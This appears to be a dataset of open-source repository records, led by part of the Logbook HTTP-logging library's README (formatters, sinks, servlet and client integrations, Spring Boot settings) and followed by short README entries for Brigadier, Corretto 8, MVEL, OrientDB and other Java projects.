The Extended Log Format ([ELF](https://en.wikipedia.org/wiki/Extended_Log_Format)) is a standardised text file format, like the Common Log Format (CLF), that is used by web servers when generating log files; ELF files, however, provide more information and flexibility. The format is supported via the `ExtendedLogFormatSink`. See also the [W3C](https://www.w3.org/TR/WD-logfile.html) document.

Default fields:

```text
date time c-ip s-dns cs-method cs-uri-stem cs-uri-query sc-status sc-bytes cs-bytes time-taken cs-protocol cs(User-Agent) cs(Cookie) cs(Referrer)
```

Default log output example:

```text
2019-08-02 08:16:41 185.85.220.253 localhost POST /search ?q=zalando 200 21 20 0.125 HTTP/1.1 "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "name=value" "https://example.com/page?q=123"
```

Users may override the default fields with their custom fields through the constructor of `ExtendedLogFormatSink`:

```java
new ExtendedLogFormatSink(new DefaultHttpLogWriter(),"date time cs(Custom-Request-Header) sc(Custom-Response-Header)")
```

For HTTP header fields `cs(Any-Header)` and `sc(Any-Header)`, users can specify any headers they want to extract from the request. Other supported fields are listed in the value of `ExtendedLogFormatSink.Field`, which can be put in the custom field expression.

##### cURL

*cURL* is an alternative formatting style, provided by the `CurlHttpLogFormatter` which will render requests as executable [`cURL`](https://curl.haxx.se/) commands. Unlike JSON, it is primarily designed for humans.

###### Request

```bash
curl -v -X GET 'http://localhost/test' -H 'Accept: application/json'
```

###### Response

See [HTTP](#http) or provide your own fallback for responses:

```java
new CurlHttpLogFormatter(new JsonHttpLogFormatter());
```

##### Splunk

*Splunk* is an alternative formatting style, provided by the `SplunkHttpLogFormatter` which will render requests and responses as key-value pairs.

###### Request

```text
origin=remote type=request correlation=2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b protocol=HTTP/1.1 sender=127.0.0.1 method=POST uri=http://example.org/test host=example.org scheme=http port=null path=/test headers={Accept=[application/json], Content-Type=[text/plain]} body=Hello world!
```

###### Response

```text
origin=local type=response correlation=2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b duration=25 protocol=HTTP/1.1 status=200 headers={Content-Type=[text/plain]} body=Hello world!
```

#### Writing

Writing defines where formatted requests and responses are written to. Logbook comes with three implementations: Logger, Stream and Chunking.
##### Logger

By default, requests and responses are logged with an *slf4j* logger that uses the `org.zalando.logbook.Logbook` category and the log level `trace`. This can be customized:

```java
Logbook logbook = Logbook.builder()
    .sink(new DefaultSink(
        new DefaultHttpLogFormatter(),
        new DefaultHttpLogWriter()
    ))
    .build();
```

##### Stream

An alternative implementation is to log requests and responses to a `PrintStream`, e.g. `System.out` or `System.err`. This is usually a bad choice for running in production, but can sometimes be useful for short-term local development and/or investigation.

```java
Logbook logbook = Logbook.builder()
    .sink(new DefaultSink(
        new DefaultHttpLogFormatter(),
        new StreamHttpLogWriter(System.err)
    ))
    .build();
```

##### Chunking

The `ChunkingSink` will split long messages into smaller chunks and will write them individually while delegating to another sink:

```java
Logbook logbook = Logbook.builder()
    .sink(new ChunkingSink(sink, 1000))
    .build();
```

#### Sink

The combination of `HttpLogFormatter` and `HttpLogWriter` suits most use cases well, but it has limitations. Implementing the `Sink` interface directly allows for more sophisticated use cases, e.g. writing requests/responses to a structured persistent storage like a database.

Multiple sinks can be combined into one using the `CompositeSink`.

### Servlet

You’ll have to register the `LogbookFilter` as a `Filter` in your filter chain — either in your `web.xml` file (please note that the XML approach will use all the defaults and is not configurable):

```xml
<filter>
    <filter-name>LogbookFilter</filter-name>
    <filter-class>org.zalando.logbook.servlet.LogbookFilter</filter-class>
</filter>
<filter-mapping>
    <filter-name>LogbookFilter</filter-name>
    <url-pattern>/*</url-pattern>
    <dispatcher>REQUEST</dispatcher>
    <dispatcher>ASYNC</dispatcher>
</filter-mapping>
```

or programmatically, via the `ServletContext`:

```java
context.addFilter("LogbookFilter", new LogbookFilter(logbook))
    .addMappingForUrlPatterns(EnumSet.of(REQUEST, ASYNC), true, "/*");
```

**Beware**: The `ERROR` dispatch is not supported. You're strongly advised to produce error responses within the `REQUEST` or `ASYNC` dispatch.

The `LogbookFilter` will, by default, treat requests with an `application/x-www-form-urlencoded` body no differently from any other request, i.e. you will see the request body in the logs. The downside of this approach is that you won't be able to use any of the `HttpServletRequest.getParameter*(..)` methods. See issue [#94](../../issues/94) for some more details.

#### Form Requests

As of Logbook 1.5.0, you can now specify one of three strategies that define how Logbook deals with this situation by using the `logbook.servlet.form-request` system property:

| Value            | Pros                                                                               | Cons                                               |
|------------------|------------------------------------------------------------------------------------|----------------------------------------------------|
| `body` (default) | Body is logged                                                                     | Downstream code can **not use `getParameter*()`**  |
| `parameter`      | Body is logged (but it's reconstructed from parameters)                            | Downstream code can **not use `getInputStream()`** |
| `off`            | Downstream code can decide whether to use `getInputStream()` or `getParameter*()` | Body is **not logged**                             |

#### Security

Secure applications usually need a slightly different setup. You should generally avoid logging unauthorized requests, especially the body, because it quickly allows attackers to flood your logfile — and, consequently, your precious disk space.
Assuming that your application handles authorization inside another filter, you have two choices:

- Don't log unauthorized requests
- Log unauthorized requests without the request body

You can easily achieve the former setup by placing the `LogbookFilter` after your security filter. The latter is a little bit more sophisticated. You’ll need two `LogbookFilter` instances — one before your security filter, and one after it:

```java
context.addFilter("SecureLogbookFilter", new SecureLogbookFilter(logbook))
    .addMappingForUrlPatterns(EnumSet.of(REQUEST, ASYNC), true, "/*");
context.addFilter("securityFilter", new SecurityFilter())
    .addMappingForUrlPatterns(EnumSet.of(REQUEST), true, "/*");
context.addFilter("LogbookFilter", new LogbookFilter(logbook))
    .addMappingForUrlPatterns(EnumSet.of(REQUEST, ASYNC), true, "/*");
```

The first logbook filter will log unauthorized requests **only**. The second filter will log authorized requests, as always.

### HTTP Client

The `logbook-httpclient` module contains both an `HttpRequestInterceptor` and an `HttpResponseInterceptor` to use with the `HttpClient`:

```java
CloseableHttpClient client = HttpClientBuilder.create()
    .addInterceptorFirst(new LogbookHttpRequestInterceptor(logbook))
    .addInterceptorFirst(new LogbookHttpResponseInterceptor())
    .build();
```

Since the `LogbookHttpResponseInterceptor` is incompatible with the `HttpAsyncClient` there is another way to log responses:

```java
CloseableHttpAsyncClient client = HttpAsyncClientBuilder.create()
    .addInterceptorFirst(new LogbookHttpRequestInterceptor(logbook))
    .build();

// and then wrap your response consumer
client.execute(producer, new LogbookHttpAsyncResponseConsumer<>(consumer), callback)
```

### HTTP Client 5

The `logbook-httpclient5` module contains an `ExecHandler` to use with the `HttpClient`:

```java
CloseableHttpClient client = HttpClientBuilder.create()
    .addExecInterceptorFirst("Logbook", new LogbookHttpExecHandler(logbook))
    .build();
```

The Handler should be added first, such that compression is performed after logging and decompression is performed before logging.

To avoid a breaking change, there is also an `HttpRequestInterceptor` and an `HttpResponseInterceptor` to use with the `HttpClient`, which work fine as long as compression (or other ExecHandlers) is not used:

```java
CloseableHttpClient client = HttpClientBuilder.create()
    .addRequestInterceptorFirst(new LogbookHttpRequestInterceptor(logbook))
    .addResponseInterceptorFirst(new LogbookHttpResponseInterceptor())
    .build();
```

Since the `LogbookHttpResponseInterceptor` is incompatible with the `HttpAsyncClient` there is another way to log responses:

```java
CloseableHttpAsyncClient client = HttpAsyncClientBuilder.create()
    .addRequestInterceptorFirst(new LogbookHttpRequestInterceptor(logbook))
    .build();

// and then wrap your response consumer
client.execute(producer, new LogbookHttpAsyncResponseConsumer<>(consumer), callback)
```

### JAX-RS 2.x and 3.x (aka Jakarta RESTful Web Services)

> [!NOTE]
> **Support for JAX-RS 2.x**
>
> JAX-RS 2.x (legacy) support was dropped in Logbook 3.0 to 3.6.
>
> As of Logbook 3.7, JAX-RS 2.x support is back.
>
> However, you need to add the `javax` **classifier** to use the proper Logbook module:
>
> ```xml
> <dependency>
>     <groupId>org.zalando</groupId>
>     <artifactId>logbook-jaxrs</artifactId>
>     <version>${logbook.version}</version>
>     <classifier>javax</classifier>
> </dependency>
> ```
>
> You should also make sure that the following dependencies are on your classpath.
> By default, `logbook-jaxrs` imports `jersey-client 3.x`, which is not compatible with JAX-RS 2.x:
>
> * [jersey-client 2.x](https://mvnrepository.com/artifact/org.glassfish.jersey.core/jersey-client/2.41)
> * [jersey-hk2 2.x](https://mvnrepository.com/artifact/org.glassfish.jersey.inject/jersey-hk2/2.41)
> * [javax.activation](https://mvnrepository.com/artifact/javax.activation/activation/1.1.1)

The `logbook-jaxrs` module contains:

A `LogbookClientFilter` to be used for applications making HTTP requests

```java
client.register(new LogbookClientFilter(logbook));
```

A `LogbookServerFilter` to be used with HTTP servers

```java
resourceConfig.register(new LogbookServerFilter(logbook));
```

### JDK HTTP Server

The `logbook-jdkserver` module provides support for the [JDK HTTP server](https://docs.oracle.com/javase/8/docs/jre/api/net/httpserver/spec/com/sun/net/httpserver/HttpServer.html) and contains:

A `LogbookFilter` to be used with the built-in server

```java
httpServer.createContext(path, handler).getFilters().add(new LogbookFilter(logbook))
```

### Netty

The `logbook-netty` module contains:

A `LogbookClientHandler` to be used with an `HttpClient`:

```java
HttpClient httpClient =
    HttpClient.create()
        .doOnConnected(
            connection -> connection.addHandlerLast(new LogbookClientHandler(logbook))
        );
```

A `LogbookServerHandler` to be used with an `HttpServer`:

```java
HttpServer httpServer =
    HttpServer.create()
        .doOnConnection(
            connection -> connection.addHandlerLast(new LogbookServerHandler(logbook))
        );
```

#### Spring WebFlux

Users of Spring WebFlux can pick any of the following options:

- Programmatically create a `NettyWebServer` (passing an `HttpServer`)
- Register a custom `NettyServerCustomizer`
- Programmatically create a `ReactorClientHttpConnector` (passing an `HttpClient`)
- Register a custom `WebClientCustomizer`
- Use the separate connector-independent module `logbook-spring-webflux`

#### Micronaut

Users of Micronaut can follow the [official docs](https://docs.micronaut.io/snapshot/guide/index.html#nettyClientPipeline) on how to integrate Logbook with Micronaut.

:warning: Even though Quarkus and Vert.x use Netty under the hood, unfortunately neither of them allows accessing or customizing it (yet).

### OkHttp v2.x

The `logbook-okhttp2` module contains an `Interceptor` to use with version 2.x of the `OkHttpClient`:

```java
OkHttpClient client = new OkHttpClient();
client.networkInterceptors().add(new LogbookInterceptor(logbook));
```

If you're expecting gzip-compressed responses you need to register our `GzipInterceptor` in addition. The transparent gzip support built into OkHttp will run after any network interceptor, which forces Logbook to log compressed binary responses.

```java
OkHttpClient client = new OkHttpClient();
client.networkInterceptors().add(new LogbookInterceptor(logbook));
client.networkInterceptors().add(new GzipInterceptor());
```

### OkHttp v3.x

The `logbook-okhttp` module contains an `Interceptor` to use with version 3.x of the `OkHttpClient`:

```java
OkHttpClient client = new OkHttpClient.Builder()
    .addNetworkInterceptor(new LogbookInterceptor(logbook))
    .build();
```

If you're expecting gzip-compressed responses you need to register our `GzipInterceptor` in addition. The transparent gzip support built into OkHttp will run after any network interceptor, which forces Logbook to log compressed binary responses.
```java
OkHttpClient client = new OkHttpClient.Builder()
    .addNetworkInterceptor(new LogbookInterceptor(logbook))
    .addNetworkInterceptor(new GzipInterceptor())
    .build();
```

### Ktor

The `logbook-ktor-client` module contains:

A `LogbookClient` to be used with an `HttpClient`:

```kotlin
private val client = HttpClient(CIO) {
    install(LogbookClient) {
        logbook = logbook
    }
}
```

The `logbook-ktor-server` module contains:

A `LogbookServer` to be used with an `Application`:

```kotlin
private val server = embeddedServer(CIO) {
    install(LogbookServer) {
        logbook = logbook
    }
}
```

Alternatively, you can use `logbook-ktor`, which ships both the `logbook-ktor-client` and `logbook-ktor-server` modules.

### Spring

The `logbook-spring` module contains a `ClientHttpRequestInterceptor` to use with `RestTemplate`:

```java
LogbookClientHttpRequestInterceptor interceptor = new LogbookClientHttpRequestInterceptor(logbook);
RestTemplate restTemplate = new RestTemplate();
restTemplate.getInterceptors().add(interceptor);
```

### Spring Boot Starter

Logbook comes with a convenient auto configuration for Spring Boot users. It sets up all of the following parts automatically with sensible defaults:

- Servlet filter
- Second Servlet filter for unauthorized requests (if Spring Security is detected)
- Header-/Parameter-/Body-Filters
- HTTP-/JSON-style formatter
- Logging writer

Instead of declaring a dependency on `logbook-core`, declare one on the Spring Boot Starter:

```xml
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-spring-boot-starter</artifactId>
    <version>${logbook.version}</version>
</dependency>
```

Every bean can be overridden and customized if needed, e.g. like this:

```java
@Bean
public BodyFilter bodyFilter() {
    return merge(
        defaultValue(),
        replaceJsonStringProperty(singleton("secret"), "XXX"));
}
```

Please refer to [`LogbookAutoConfiguration`](logbook-spring-boot-autoconfigure/src/main/java/org/zalando/logbook/autoconfigure/LogbookAutoConfiguration.java) or the following table to see a list of possible integration points:

| Type                     | Name                  | Default                                                                                        |
|--------------------------|-----------------------|------------------------------------------------------------------------------------------------|
| `FilterRegistrationBean` | `secureLogbookFilter` | Based on `LogbookFilter`                                                                        |
| `FilterRegistrationBean` | `logbookFilter`       | Based on `LogbookFilter`                                                                        |
| `Logbook`                |                       | Based on condition, filters, formatter and writer                                               |
| `Predicate<HttpRequest>` | `requestCondition`    | No filter; is later combined with `logbook.predicate.include` and `logbook.predicate.exclude`   |
| `HeaderFilter`           |                       | Based on `logbook.obfuscate.headers`                                                            |
| `PathFilter`             |                       | Based on `logbook.obfuscate.paths`                                                              |
| `QueryFilter`            |                       | Based on `logbook.obfuscate.parameters`                                                         |
| `BodyFilter`             |                       | `BodyFilters.defaultValue()`, see [filtering](#filtering)                                       |
| `RequestFilter`          |                       | `RequestFilters.defaultValue()`, see [filtering](#filtering)                                    |
| `ResponseFilter`         |                       | `ResponseFilters.defaultValue()`, see [filtering](#filtering)                                   |
| `Strategy`               |                       | `DefaultStrategy`                                                                               |
| `AttributeExtractor`     |                       | `NoOpAttributeExtractor`                                                                        |
| `Sink`                   |                       | `DefaultSink`                                                                                   |
| `HttpLogFormatter`       |                       | `JsonHttpLogFormatter`                                                                          |
| `HttpLogWriter`          |                       | `DefaultHttpLogWriter`                                                                          |

Multiple filters are merged into one.

#### Autoconfigured beans from `logbook-spring`

Some classes from `logbook-spring` are included in the auto configuration.
You can autowire `LogbookClientHttpRequestInterceptor` with code like:

```java
private final RestTemplate restTemplate;

MyClient(RestTemplateBuilder builder, LogbookClientHttpRequestInterceptor interceptor) {
    this.restTemplate = builder
        .additionalInterceptors(interceptor)
        .build();
}
```

#### Configuration

The following table shows the available configuration (sorted alphabetically):

| Configuration                             | Description                                                                                                                                                                                                   | Default            |
|-------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------|
| `logbook.attribute-extractors`            | List of [AttributeExtractor](#attribute-extractor)s, including configurations such as `type` (currently `JwtFirstMatchingClaimExtractor` or `JwtAllMatchingClaimsExtractor`), `claim-names` and `claim-key`.  | `[]`               |
| `logbook.filter.enabled`                  | Enable the [`LogbookFilter`](#servlet)                                                                                                                                                                         | `true`             |
| `logbook.filter.form-request-mode`        | Determines how [form requests](#form-requests) are handled                                                                                                                                                     | `body`             |
| `logbook.filters.body.default-enabled`    | Enables/disables default body filters that are collected by `java.util.ServiceLoader`                                                                                                                          | `true`             |
| `logbook.format.style`                    | [Formatting style](#formatting) (`http`, `json`, `curl` or `splunk`)                                                                                                                                           | `json`             |
| `logbook.httpclient.decompress-response`  | Enables/disables an additional decompression step for HttpClient with gzip-encoded bodies (for logging purposes only). This means extra decompression and a possible performance impact.                       | `false` (disabled) |
| `logbook.minimum-status`                  | Minimum status to enable logging (`status-at-least` and `body-only-if-status-at-least`)                                                                                                                        | `400`              |
| `logbook.obfuscate.headers`               | List of header names that need obfuscation                                                                                                                                                                     | `[Authorization]`  |
| `logbook.obfuscate.json-body-fields`      | List of JSON body fields to be obfuscated                                                                                                                                                                      | `[]`               |
| `logbook.obfuscate.parameters`            | List of parameter names that need obfuscation                                                                                                                                                                  | `[access_token]`   |
| `logbook.obfuscate.paths`                 | List of paths that need obfuscation. Check [Filtering](#filtering) for syntax.                                                                                                                                 | `[]`               |
| `logbook.obfuscate.replacement`           | A value to be used instead of an obfuscated one                                                                                                                                                                | `XXX`              |
| `logbook.predicate.include`               | Include only certain paths and methods (if defined)                                                                                                                                                            | `[]`               |
| `logbook.predicate.exclude`               | Exclude certain paths and methods (overrides `logbook.predicate.include`)                                                                                                                                      | `[]`               |
| `logbook.secure-filter.enabled`           | Enable the [`SecureLogbookFilter`](#servlet)                                                                                                                                                                   | `true`             |
| `logbook.strategy`                        | [Strategy](#strategy) (`default`, `status-at-least`, `body-only-if-status-at-least`, `without-body`)                                                                                                           | `default`          |
| `logbook.write.chunk-size`                | Splits log lines into smaller chunks of size up to `chunk-size`.                                                                                                                                               | `0` (disabled)     |
| `logbook.write.max-body-size`             | Truncates the body up to `max-body-size` and appends `...`. <br/> :warning: Logbook will still buffer the full body, if the request is eligible for logging, regardless of the `logbook.write.max-body-size` value | `-1` (disabled)    |

##### Example configuration

```yaml
logbook:
  predicate:
    include:
      - path: /api/**
        methods:
          - GET
          - POST
      - path: /actuator/**
    exclude:
      - path: /actuator/health
      - path: /api/admin/**
        methods:
          - POST
  filter.enabled: true
  secure-filter.enabled: true
  format.style: http
  strategy: body-only-if-status-at-least
  minimum-status: 400
  obfuscate:
    headers:
      - Authorization
      - X-Secret
    parameters:
      - access_token
      - password
  write:
    chunk-size: 1000
  attribute-extractors:
    - type: JwtFirstMatchingClaimExtractor
      claim-names: [ "sub", "subject" ]
      claim-key: Principal
    - type: JwtAllMatchingClaimsExtractor
      claim-names: [ "sub", "iat" ]
```

### logstash-logback-encoder

For a basic Logback configuration

```xml
<appender name="STDOUT" class="ch.qos.logback.core.ConsoleAppender">
    <encoder class="net.logstash.logback.encoder.LogstashEncoder"/>
</appender>
```

configure Logbook with a `LogstashLogbackSink`

```java
HttpLogFormatter formatter = new JsonHttpLogFormatter();
LogstashLogbackSink sink = new LogstashLogbackSink(formatter);
```

for outputs like

```
{
  "@timestamp" : "2019-03-08T09:37:46.239+01:00",
  "@version" : "1",
  "message" : "GET http://localhost/test?limit=1",
  "logger_name" : "org.zalando.logbook.Logbook",
  "thread_name" : "main",
  "level" : "TRACE",
  "level_value" : 5000,
  "http" : {
    // logbook request/response contents
  }
}
```

#### Customizing the default Logging Level

You have the flexibility to customize the default logging level by initializing `LogstashLogbackSink` with a specific level. For instance:

```java
LogstashLogbackSink sink = new LogstashLogbackSink(formatter, Level.INFO);
```

## Known Issues

1. The Logbook Servlet Filter interferes with downstream code using `getWriter` and/or `getParameter*()`. See [Servlet](#servlet) for more details.
2. The Logbook Servlet Filter does **NOT** support the `ERROR` dispatch. You're strongly encouraged not to use it to produce error responses.

## Getting Help with Logbook

If you have questions, concerns, bug reports, etc., please file an issue in this repository's [Issue Tracker](https://github.com/zalando/logbook/issues).

## Getting Involved/Contributing

To contribute, simply make a pull request and add a brief description (1-2 sentences) of your addition or change. For more details, check the [contribution guidelines](.github/CONTRIBUTING.md).
## Alternatives

- [Apache HttpClient Wire Logging](http://hc.apache.org/httpcomponents-client-4.5.x/logging.html)
  - Client-side only
  - Apache HttpClient exclusive
  - Support for HTTP bodies
- [Spring Boot Access Logging](http://docs.spring.io/spring-boot/docs/current/reference/htmlsingle/#howto-configure-accesslogs)
  - Spring application only
  - Server-side only
  - Tomcat/Undertow/Jetty exclusive
  - **No** support for HTTP bodies
- [Tomcat Request Dumper Filter](https://tomcat.apache.org/tomcat-7.0-doc/config/filter.html#Request_Dumper_Filter)
  - Server-side only
  - Tomcat exclusive
  - **No** support for HTTP bodies
- [logback-access](http://logback.qos.ch/access.html)
  - Server-side only
  - Any servlet container
  - Support for HTTP bodies

## Credits and References

![Creative Commons (Attribution-Share Alike 3.0 Unported)](https://licensebuttons.net/l/by-sa/3.0/80x15.png)

[*Grand Turk, a replica of a three-masted 6th rate frigate from Nelson's days - logbook and charts*](https://commons.wikimedia.org/wiki/File:Grand_Turk(34).jpg) by [JoJan](https://commons.wikimedia.org/wiki/User:JoJan) is licensed under a [Creative Commons (Attribution-Share Alike 3.0 Unported)](http://creativecommons.org/licenses/by-sa/3.0/) license.
0
Mojang/brigadier
Brigadier is a command parser & dispatcher, designed and developed for Minecraft: Java Edition.
null
# Brigadier [![Latest release](https://img.shields.io/github/release/Mojang/brigadier.svg)](https://github.com/Mojang/brigadier/releases/latest) [![License](https://img.shields.io/github/license/Mojang/brigadier.svg)](https://github.com/Mojang/brigadier/blob/master/LICENSE) Brigadier is a command parser & dispatcher, designed and developed for Minecraft: Java Edition and now freely available for use elsewhere under the MIT license. # Installation Brigadier is available to Maven & Gradle via `libraries.minecraft.net`. Its group is `com.mojang`, and artifact name is `brigadier`. ## Gradle First include our repository: ```groovy maven { url "https://libraries.minecraft.net" } ``` And then use this library (change `(the latest version)` to the latest version!): ```groovy compile 'com.mojang:brigadier:(the latest version)' ``` ## Maven First include our repository: ```xml <repository> <id>minecraft-libraries</id> <name>Minecraft Libraries</name> <url>https://libraries.minecraft.net</url> </repository> ``` And then use this library (change `(the latest version)` to the latest version!): ```xml <dependency> <groupId>com.mojang</groupId> <artifactId>brigadier</artifactId> <version>(the latest version)</version> </dependency> ``` # Contributing Contributions are welcome! :D Most contributions will require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.microsoft.com. This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments. # Usage At the heart of Brigadier, you need a `CommandDispatcher<S>`, where `<S>` is any custom object you choose to identify a "command source". A command dispatcher holds a "command tree", which is a series of `CommandNode`s that represent the various possible syntax options that form a valid command. ## Registering a new command Before we can start parsing and dispatching commands, we need to build up our command tree. Every registration is an append operation, so you can freely extend existing commands in a project without needing access to the source code that created them. Command registration also encourages the use of a builder pattern to keep code cruft to a minimum. A "command" is a fairly loose term, but typically it means an exit point of the command tree. Every node can have an `executes` function attached to it, which signifies that if the input stops here then this function will be called with the context so far. Consider the following example: ```java CommandDispatcher<CommandSourceStack> dispatcher = new CommandDispatcher<>(); dispatcher.register( literal("foo") .then( argument("bar", integer()) .executes(c -> { System.out.println("Bar is " + getInteger(c, "bar")); return 1; }) ) .executes(c -> { System.out.println("Called foo with no arguments"); return 1; }) ); ``` This snippet registers two "commands": `foo` and `foo <bar>`. It is also common to refer to the `<bar>` as a "subcommand" of `foo`, as it's a child node. At the start of the tree is a "root node", and it **must** have `LiteralCommandNode`s as children. Here, we register one command under the root: `literal("foo")`, which means "the user must type the literal string 'foo'". 
Under that are two extra definitions: a child node for possible further evaluation, or an `executes` block if the user input stops here.

The child node works exactly the same way, but is no longer limited to literals. The other type of node that is now allowed is an `ArgumentCommandNode`, which takes in a name and an argument type.

Arguments can be anything, and you are encouraged to build your own for seamless integration into your own product. There are some standard arguments included in Brigadier, such as `IntegerArgumentType`.

Argument types will be asked to parse input as much as they can, and then store the "result" of that argument however they see fit, or throw a relevant error if they can't parse. For example, an integer argument would parse "123" and store it as `123` (`int`), but throw an error if the input were `onetwothree`.

When a command is actually run, it can access these arguments in the context provided to the registered function.

## Parsing user input

So, we've registered some commands and now we're ready to take in user input. If you're in a rush, you can just call `dispatcher.execute("foo 123", source)` and call it a day.

The result of `execute` is an integer that was returned from an evaluated command. The meaning of this integer depends on the command, and will typically not be useful to programmers.

The `source` is an object of `<S>`, your own custom class to track users/players/etc. It will be provided to the command so that it has some context on what's happening.

If the command failed or could not parse, some form of `CommandSyntaxException` will be thrown. It is also possible for a `RuntimeException` to be bubbled up, if not properly handled in a command.

If you wish to have more control over the parsing & executing of commands, or wish to cache the parse results so you can execute them multiple times, you can split it up into two steps:

```java
final ParseResults<S> parse = dispatcher.parse("foo 123", source);
final int result = dispatcher.execute(parse);
```

This is highly recommended as the parse step is the most expensive, and may be easily cached depending on your application. You can also use this to do further introspection on a command, before (or without) actually running it.

## Inspecting a command

If you `parse` some input, you can find out what it will perform (if anything) and provide hints to the user safely and immediately.

The parse will never fail, and the `ParseResults<S>` it returns will contain a *possible* context that a command may be called with (and from that, you can inspect which nodes the user entered, complete with start/end positions in the input string). It also contains a map of parse exceptions for each command node it encountered. If it couldn't build a valid context, then the reason why is inside this exception map.

## Displaying usage info

There are two forms of "usage strings" provided by this library, both of which require a target node.

`getAllUsage(node, source, restricted)` will return a list of all possible commands (executable end-points) under the target node and their human readable path. If `restricted`, it will ignore commands that `source` does not have access to. This will look like [`foo`, `foo <bar>`].

`getSmartUsage(node, source)` will return a map of the child nodes to their "smart usage" human readable path. This tries to squash future-nodes together and show optional & typed information, and can look like `foo (<bar>)`.
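As a minimal sketch of both calls, assuming the `dispatcher` and a `source` of type `CommandSourceStack` from the earlier snippets (the variable names here are illustrative, not part of the original README):

```java
// Requires imports of java.util.Map and com.mojang.brigadier.tree.CommandNode.

// All executable paths under the root node, e.g. ["foo", "foo <bar>"].
String[] allUsage = dispatcher.getAllUsage(dispatcher.getRoot(), source, false);

// Smart usage squashes child nodes into compact forms, e.g. "foo (<bar>)".
Map<CommandNode<CommandSourceStack>, String> smartUsage =
    dispatcher.getSmartUsage(dispatcher.getRoot(), source);
```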
[![GitHub forks](https://img.shields.io/github/forks/Mojang/brigadier.svg?style=social&label=Fork)](https://github.com/Mojang/brigadier/fork) [![GitHub stars](https://img.shields.io/github/stars/Mojang/brigadier.svg?style=social&label=Stars)](https://github.com/Mojang/brigadier/stargazers)
0
spring-cloud/spring-cloud-netflix
Integration with Netflix OSS components
cloud-native feign java microservices netflix-eureka netflix-hystrix netflix-zuul netflixoss ribbon spring spring-boot spring-cloud spring-cloud-core
null
0
warmuuh/milkman
An Extensible Request/Response Workbench
grpc hacktoberfest http milkman-plugins rest testing
null
0
corretto/corretto-8
Amazon Corretto 8 is a no-cost, multi-platform, production-ready distribution of OpenJDK 8
null
## Corretto 8 Amazon Corretto is a no-cost, multiplatform, production-ready distribution of the Open Java Development Kit (OpenJDK). Corretto is used internally at Amazon for production services. With Corretto, you can develop and run Java applications on operating systems such as Amazon Linux 2, Windows, and macOS. The latest binary Corretto 8 release builds can be downloaded from [https://github.com/corretto/corretto-8/releases](https://github.com/corretto/corretto-8/releases). Documentation is available at [https://docs.aws.amazon.com/corretto](https://docs.aws.amazon.com/corretto). ### Licenses and Trademarks Please read these files: "LICENSE", "THIRD_PARTY_README", "ASSEMBLY_EXCEPTION", "TRADEMARKS.md". ### Branches _develop_ : The default branch. It absorbs active development contributions from forks or topic branches via pull requests that pass smoke testing and are accepted. _master_ : The stable branch. Starting point for the release process. It absorbs contributions from the develop branch that pass more thorough testing and are selected for releasing. _ga-release_ : The source code of the GA release on 01/31/2019. _preview-release_ : The source code of the preview release on 11/14/2018. _release-8.XXX.YY.Z_ : The source code for each release is recorded by a branch or a tag with a name of this form. XXX stands for the OpenJDK 8 update number, YY for the OpenJDK 8 build number, and Z for the Corretto-specific revision number. The latter starts at 1 and is incremented in subsequent releases as long as the update and build number remain constant. ### OpenJDK Readme ``` Welcome to the JDK! =================== For build instructions please see https://openjdk.java.net/groups/build/doc/building.html, or either of these files: - doc/building.html (html version) - doc/building.md (markdown version) See https://openjdk.java.net for more information about the OpenJDK Community and the JDK. ```
0
mvel/mvel
MVEL (MVFLEX Expression Language)
null
# MVEL

MVFLEX Expression Language (MVEL) is a hybrid dynamically/statically typed, embeddable Expression Language and runtime for the Java Platform.

## Documentation

http://mvel.documentnode.com/

## How to build

```bash
git clone https://github.com/mvel/mvel.git
cd mvel
mvn clean install
```
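Since the README stops at the build step, here is a minimal sketch (not from the original document) of embedding MVEL to evaluate an expression via the `org.mvel2.MVEL` entry point:

```java
import java.util.HashMap;
import java.util.Map;

import org.mvel2.MVEL;

public class MvelExample {
    public static void main(String[] args) {
        // Variables the expression can reference.
        Map<String, Object> vars = new HashMap<>();
        vars.put("x", 10);
        vars.put("y", 32);

        // Evaluate a dynamic expression against the supplied variables.
        Object result = MVEL.eval("x + y", vars);
        System.out.println(result); // prints 42
    }
}
```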
0
orientechnologies/orientdb
OrientDB is the most versatile DBMS supporting Graph, Document, Reactive, Full-Text and Geospatial models in one Multi-Model product. OrientDB can run distributed (Multi-Master), supports SQL, ACID Transactions, Full-Text indexing and Reactive Queries.
database dbms document-database fast graph-database graph-store multi-master multi-model-dbms nosql orientdb performance sql
## OrientDB

[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) [![REUSE status](https://api.reuse.software/badge/github.com/orientechnologies/orientdb)](https://api.reuse.software/info/github.com/orientechnologies/orientdb)

------

## What is OrientDB?

**OrientDB** is an Open Source Multi-Model [NoSQL](http://en.wikipedia.org/wiki/NoSQL) DBMS with support for Native Graphs, Documents, Full-Text search, Reactivity, Geo-Spatial and Object Oriented concepts. It's written in Java and it's amazingly fast. There are no expensive run-time JOINs: connections are managed as persistent pointers between records, so you can traverse thousands of records in no time. It supports schema-less, schema-full and schema-mixed modes, has a strong security profiling system based on users, roles and predicate security, and supports [SQL](https://orientdb.org/docs/3.1.x/sql/) amongst its query languages. Thanks to the [SQL](https://orientdb.org/docs/3.1.x/sql/) layer it's straightforward to use for people skilled in the Relational world.

[Get started with OrientDB](http://orientdb.org/docs/3.2.x/gettingstarted/) | [OrientDB Community Group](https://github.com/orientechnologies/orientdb/discussions) | [Dev Updates](https://fosstodon.org/@orientdb) | [Community Chat](https://matrix.to/#/#orientdb-community:matrix.org)

## Is OrientDB a Relational DBMS?

No. OrientDB adheres to the [NoSQL](http://en.wikipedia.org/wiki/NoSQL) movement even though it supports [ACID Transactions](https://orientdb.org/docs/3.2.x/internals/Transactions.html) and [SQL](https://orientdb.org/docs/3.2.x/sql/) as a query language. In this way it's easy to start using it without having to learn too much new stuff.

## Easy to install and use

